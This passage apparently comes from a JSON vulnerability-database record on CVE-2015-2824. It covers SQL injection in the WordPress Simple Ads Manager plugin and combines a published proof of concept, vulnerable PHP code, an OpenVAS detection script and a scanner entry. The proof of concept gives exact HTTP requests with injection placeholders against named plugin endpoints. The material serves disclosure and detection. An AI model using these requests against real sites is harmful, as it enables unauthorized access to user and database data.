));\t\n\t\t }\n\t\t break;\n\n\n\t\t \n\t\t \n---SQL INJECTION 2---\n+REQUEST\nPOST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1\nHost: hostname\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page\n\n+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php\n+ Vulnerable code:\ncase 'sam_ajax_load_posts':\n $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';\n $sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) : 'Post';\n $sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) : 'Page';\n\n //set @row_num = 0;\n //SELECT @row_num := @row_num + 1 AS recid\n $sql = \"SELECT\n wp.id,\n wp.post_title AS title,\n wp.post_type AS type\n FROM\n $postTable wp\n WHERE\n wp.post_status = 'publish' AND\n FIND_IN_SET(wp.post_type, 'post,page{$custs}')\n ORDER BY wp.id;\";\n\n $posts = $wpdb->get_results($sql, ARRAY_A);\n\n $k = 0;\n foreach($posts as &$val) {\n switch($val['type']) {\n case 'post':\n $val['type'] = $sPost;\n break;\n case 'page':\n $val['type'] = $sPage;\n break;\n default:\n $val['type'] = $sPost . ': '.$val['type'];\n break;\n }\n $k++;\n $val['recid'] = $k;\n }\n $out = array(\n 'status' => 'success',\n 'total' => count($posts),\n 'records' => $posts\n );\n break;\n\n\t \n\t \n---SQL INJECTION 3---\n+REQUEST:\n\nPOST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL INJECTION HERE> HTTP/1.1\nHost: hostname\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmb=30068390.1.10.1427794022; __utmc=30068390\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 22\n\naction=load_combo_data\n\n+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php\n+Vulnerable code: from line 225 to 255\n case 'sam_ajax_load_combo_data':\n $page = $_GET['page'];\n $rows = $_GET['rows'];\n $searchTerm = $_GET['searchTerm'];\n $offset = ((int)$page - 1) * (int)$rows;\n $sql = \"SELECT\n wu.id,\n wu.display_name AS title,\n wu.user_nicename AS slug,\n wu.user_email AS email\n FROM\n $uTable wu\n WHERE wu.user_nicename LIKE '{$searchTerm}%'\n ORDER BY wu.id\n LIMIT $offset, $rows;\";\n $users = $wpdb->get_results($sql, ARRAY_A);\n $sql = \"SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE '{$searchTerm}%';\";\n $rTotal = $wpdb->get_var($sql);\n $total = ceil((int)$rTotal/(int)$rows);\n $out = array(\n 'page' => $page,\n 'records' => count($users),\n 'rows' => $users,\n 'total' => $total,\n 'offset' => $offset\n );\n break;\n\n\t \n\t \n\t \n---SQL INJECTION 4---\n\n+ REQUEST\n\nPOST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1\nHost: hostname\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmc=30068390\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 73\n\naction=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION HERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL INJECTION HERE>&sadmin=<SQL INJECTION HERE>\n\n+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php\n\n+ Vulnerable code: from line 188 to 223\n case 'sam_ajax_load_users':\n $roleSubscriber = (isset($_REQUEST['subscriber'])) ? urldecode($_REQUEST['subscriber']) : 'Subscriber';\n $roleContributor = (isset($_REQUEST['contributor'])) ? urldecode($_REQUEST['contributor']) : 'Contributor';\n $roleAuthor = (isset($_REQUEST['author'])) ? urldecode($_REQUEST['author']) : 'Author';\n $roleEditor = (isset($_REQUEST['editor'])) ? urldecode($_REQUEST['editor']) : 'Editor';\n $roleAdministrator = (isset($_REQUEST[\"admin\"])) ? urldecode($_REQUEST[\"admin\"]) : 'Administrator';\n $roleSuperAdmin = (isset($_REQUEST['sadmin'])) ? urldecode($_REQUEST['sadmin']) : 'Super Admin';\n $sql = \"SELECT\n wu.id,\n wu.display_name AS title,\n wu.user_nicename AS slug,\n (CASE wum.meta_value\n WHEN 0 THEN '$roleSubscriber'\n WHEN 1 THEN '$roleContributor'\n WHEN 2 THEN '$roleAuthor'\n ELSE\n IF(wum.meta_value > 2 AND wum.meta_value <= 7, '$roleEditor',\n IF(wum.meta_value > 7 AND wum.meta_value <= 10, '$roleAdministrator',\n IF(wum.meta_value > 10, '$roleSuperAdmin', NULL)\n )\n )\n END) AS role\n FROM $uTable wu\n INNER JOIN $umTable wum\n ON wu.id = wum.user_id AND wum.meta_key = '$userLevel'\n ORDER BY wu.id;\";\n $users = $wpdb->get_results($sql, ARRAY_A);\n $k = 0;\n foreach($users as &$val) {\n $k++;\n $val['recid'] = $k;\n }\n $out = $users;\n break;", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:16", "description": "", "published": "2015-04-03T00:00:00", "type": "packetstorm", "title": "WordPress Simple Ads Manager 2.5.94 / 2.5.96 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2824"], "modified": "2015-04-03T00:00:00", "id": "PACKETSTORM:131280", "href": "https://packetstormsecurity.com/files/131280/WordPress-Simple-Ads-Manager-2.5.94-2.5.96-SQL-Injection.html", "sourceData": "`#Vulnerability title: Wordpress plugin Simple Ads Manager - Multiple SQL \nInjection \n#Product: Wordpress plugin Simple Ads Manager \n#Vendor: https://profiles.wordpress.org/minimus/ \n#Affected version: Simple Ads Manager 2.5.94 and 2.5.96 #Download link: \nhttps://wordpress.org/plugins/simple-ads-manager/ \n#CVE ID: CVE-2015-2824 \n#Author: Le Hong Minh (minh.h.le@itas.vn) & ITAS Team \n \n \n::PROOF OF CONCEPT:: \n \n---SQL INJECTION 1--- \n \n+ REQUEST: \n \nPOST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1 \nHost: target.com \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 \nFirefox/28.0 \nAccept: */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nX-Requested-With: XMLHttpRequest \nReferer: http://target.com/archives/wordpress-plugin-simple-ads-manager/ \nContent-Length: 270 \nCookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938; \nPHPSESSID=kqvtir87g33e2ujkc290l5bmm7; \ncre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1 \nConnection: keep-alive \nPragma: no-cache \nCache-Control: no-cache \n \naction=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION \nHERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL \nINJECTION HERE>&level=3 \n \n \n- Vulnerable file: simple-ads-manager/sam-ajax.php \n- Vulnerable code: \n \ncase 'sam_ajax_sam_hits': \nif(isset($_POST['hits']) && is_array($_POST['hits'])) { \n$hits = $_POST['hits']; \n$values = ''; \n$remoteAddr = $_SERVER['REMOTE_ADDR']; \nforeach($hits as $hit) { \n$values .= ((empty($values)) ? '' : ', ') \n. \"({$hit[1]}, {$hit[0]}, NOW(), 0, \\\"{$remoteAddr}\\\")\"; \n} \n$sql = \"INSERT INTO $sTable (id, pid, event_time, \nevent_type, remote_addr) VALUES {$values};\"; \n$result = $wpdb->query($sql); \nif($result > 0) echo json_encode(array('success' \n=> true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR'])); \nelse echo json_encode(array( \n'success' => false, \n'result' => $result, \n'sql' => $sql, \n'hits' => $hits, \n'values' => $values \n)); \n} \nbreak; \n \n \n \n \n---SQL INJECTION 2--- \n+REQUEST \nPOST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 \nHost: hostname \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nX-Requested-With: XMLHttpRequest \n \naction=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page \n \n+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php \n+ Vulnerable code: \ncase 'sam_ajax_load_posts': \n$custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : ''; \n$sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) : \n'Post'; \n$sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) : \n'Page'; \n \n//set @row_num = 0; \n//SELECT @row_num := @row_num + 1 AS recid \n$sql = \"SELECT \nwp.id, \nwp.post_title AS title, \nwp.post_type AS type \nFROM \n$postTable wp \nWHERE \nwp.post_status = 'publish' AND \nFIND_IN_SET(wp.post_type, 'post,page{$custs}') \nORDER BY wp.id;\"; \n \n$posts = $wpdb->get_results($sql, ARRAY_A); \n \n$k = 0; \nforeach($posts as &$val) { \nswitch($val['type']) { \ncase 'post': \n$val['type'] = $sPost; \nbreak; \ncase 'page': \n$val['type'] = $sPage; \nbreak; \ndefault: \n$val['type'] = $sPost . ': '.$val['type']; \nbreak; \n} \n$k++; \n$val['recid'] = $k; \n} \n$out = array( \n'status' => 'success', \n'total' => count($posts), \n'records' => $posts \n); \nbreak; \n \n \n \n---SQL INJECTION 3--- \n+REQUEST: \n \nPOST \n/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL \nINJECTION HERE> HTTP/1.1 \nHost: hostname \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 \nFirefox/36.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; \n__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) \n; \nwp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align% \n3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3 \nDshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; \nwp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; \nwordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; \n__utmb=30068390.1.10.1427794022; __utmc=30068390 \nConnection: keep-alive \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 22 \n \naction=load_combo_data \n \n+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php \n+Vulnerable code: from line 225 to 255 \ncase 'sam_ajax_load_combo_data': \n$page = $_GET['page']; \n$rows = $_GET['rows']; \n$searchTerm = $_GET['searchTerm']; \n$offset = ((int)$page - 1) * (int)$rows; \n$sql = \"SELECT \nwu.id, \nwu.display_name AS title, \nwu.user_nicename AS slug, \nwu.user_email AS email \nFROM \n$uTable wu \nWHERE wu.user_nicename LIKE '{$searchTerm}%' \nORDER BY wu.id \nLIMIT $offset, $rows;\"; \n$users = $wpdb->get_results($sql, ARRAY_A); \n$sql = \"SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE \n'{$searchTerm}%';\"; \n$rTotal = $wpdb->get_var($sql); \n$total = ceil((int)$rTotal/(int)$rows); \n$out = array( \n'page' => $page, \n'records' => count($users), \n'rows' => $users, \n'total' => $total, \n'offset' => $offset \n); \nbreak; \n \n \n \n \n---SQL INJECTION 4--- \n \n+ REQUEST \n \nPOST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 \nHost: hostname \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 \nFirefox/36.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; \n__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) \n; \nwp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align% \n3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3 \nDshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; \nwp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; \nwordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; \n__utmc=30068390 \nConnection: keep-alive \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 73 \n \naction=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION \nHERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL \nINJECTION HERE>&sadmin=<SQL INJECTION HERE> \n \n+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php \n \n+ Vulnerable code: from line 188 to 223 \ncase 'sam_ajax_load_users': \n$roleSubscriber = (isset($_REQUEST['subscriber'])) ? \nurldecode($_REQUEST['subscriber']) : 'Subscriber'; \n$roleContributor = (isset($_REQUEST['contributor'])) ? \nurldecode($_REQUEST['contributor']) : 'Contributor'; \n$roleAuthor = (isset($_REQUEST['author'])) ? \nurldecode($_REQUEST['author']) : 'Author'; \n$roleEditor = (isset($_REQUEST['editor'])) ? \nurldecode($_REQUEST['editor']) : 'Editor'; \n$roleAdministrator = (isset($_REQUEST[\"admin\"])) ? \nurldecode($_REQUEST[\"admin\"]) : 'Administrator'; \n$roleSuperAdmin = (isset($_REQUEST['sadmin'])) ? \nurldecode($_REQUEST['sadmin']) : 'Super Admin'; \n$sql = \"SELECT \nwu.id, \nwu.display_name AS title, \nwu.user_nicename AS slug, \n(CASE wum.meta_value \nWHEN 0 THEN '$roleSubscriber' \nWHEN 1 THEN '$roleContributor' \nWHEN 2 THEN '$roleAuthor' \nELSE \nIF(wum.meta_value > 2 AND wum.meta_value <= 7, \n'$roleEditor', \nIF(wum.meta_value > 7 AND wum.meta_value <= 10, \n'$roleAdministrator', \nIF(wum.meta_value > 10, '$roleSuperAdmin', NULL) \n) \n) \nEND) AS role \nFROM $uTable wu \nINNER JOIN $umTable wum \nON wu.id = wum.user_id AND wum.meta_key = '$userLevel' \nORDER BY wu.id;\"; \n$users = $wpdb->get_results($sql, ARRAY_A); \n$k = 0; \nforeach($users as &$val) { \n$k++; \n$val['recid'] = $k; \n} \n$out = $users; \nbreak; \n \nREFERENCE: \n+ https://www.youtube.com/watch?v=HPJ1r9dhIB4 \n \n \nBest Regards \n----------------------------------- \nITAS Team (www.itas.vn) \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/131280/wpsam-sql.txt"}], "openvas": [{"lastseen": "2020-02-27T18:54:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2826", "CVE-2015-2824"], "description": "The host is installed with WordPress\n Simple Ads Manager Plugin and is prone to multiple vulnerabilities.", "modified": "2020-02-26T00:00:00", "published": "2015-04-14T00:00:00", "id": "OPENVAS:1361412562310805520", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805520", "type": "openvas", "title": "WordPress Simple Ads Manager Plugin Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# WordPress Simple Ads Manager Plugin Multiple Vulnerabilities\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805520\");\n script_version(\"2020-02-26T12:57:19+0000\");\n script_cve_id(\"CVE-2015-2824\", \"CVE-2015-2826\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-26 12:57:19 +0000 (Wed, 26 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-04-14 11:59:52 +0530 (Tue, 14 Apr 2015)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"WordPress Simple Ads Manager Plugin Multiple Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"The host is installed with WordPress\n Simple Ads Manager Plugin and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP POST\n request and check whether it is is able to read sensitive information or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - The sam-ajax-admin.php script not properly sanitizing user-supplied input to\n the 'cstr', 'searchTer', 'subscriber', 'contributor', 'author', 'editor',\n 'admin', and 'sadmin' POST parameters.\n\n - The error in handling a specially crafted POST request sent for the\n /sam-ajax-admin.php script with the 'action' parameter set to values such\n as 'load_users', 'load_authors', 'load_cats', 'load_tags', 'load_posts',\n 'posts_debug', or 'load_stats'.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attacker to inject or manipulate SQL queries in the back-end database,\n allowing for the manipulation or disclosure of arbitrary data and gain\n access to potentially sensitive information.\");\n\n script_tag(name:\"affected\", value:\"WordPress Simple Ads Manager versions 2.5.94\n and 2.6.96\");\n\n script_tag(name:\"solution\", value:\"Update to 2.7.97 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/36613\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/36615\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"https://profiles.wordpress.org/minimus\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:http_port)){\n exit(0);\n}\n\nurl = dir + \"/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php\";\n\npostData = \"action=load_users\";\n\nuseragent = http_get_user_agent();\nhost = http_host_name(port:http_port);\n\nwpReq = string(\"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postData), \"\\r\\n\",\n \"\\r\\n\", postData, \"\\r\\n\\r\\n\");\nwpRes = http_keepalive_send_recv(port:http_port, data:wpReq);\n\nif(wpRes && \"id\" >< wpRes && \"title\" >< wpRes && \"slug\" >< wpRes &&\n \"role\" >< wpRes && \"recid\" >< wpRes)\n{\n security_message(http_port);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:22:28", "bulletinFamily": "software", "cvelist": ["CVE-2015-2824", "CVE-2015-2825", "CVE-2015-2826"], "description": "The simple-ads-manager WordPress plugin was affected by an Arbitrary File Upload & SQL Injection security vulnerability.\n", "modified": "2020-09-22T07:07:07", "published": "2015-04-02T00:00:00", "id": "WPVDB-ID:89F75C74-4126-467B-AADD-04B1C1BBC941", "href": "https://wpscan.com/vulnerability/89f75c74-4126-467b-aadd-04b1c1bbc941", "type": "wpvulndb", "title": "Simple Ads Manager <= 2.5.94 - Arbitrary File Upload & SQL Injection", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}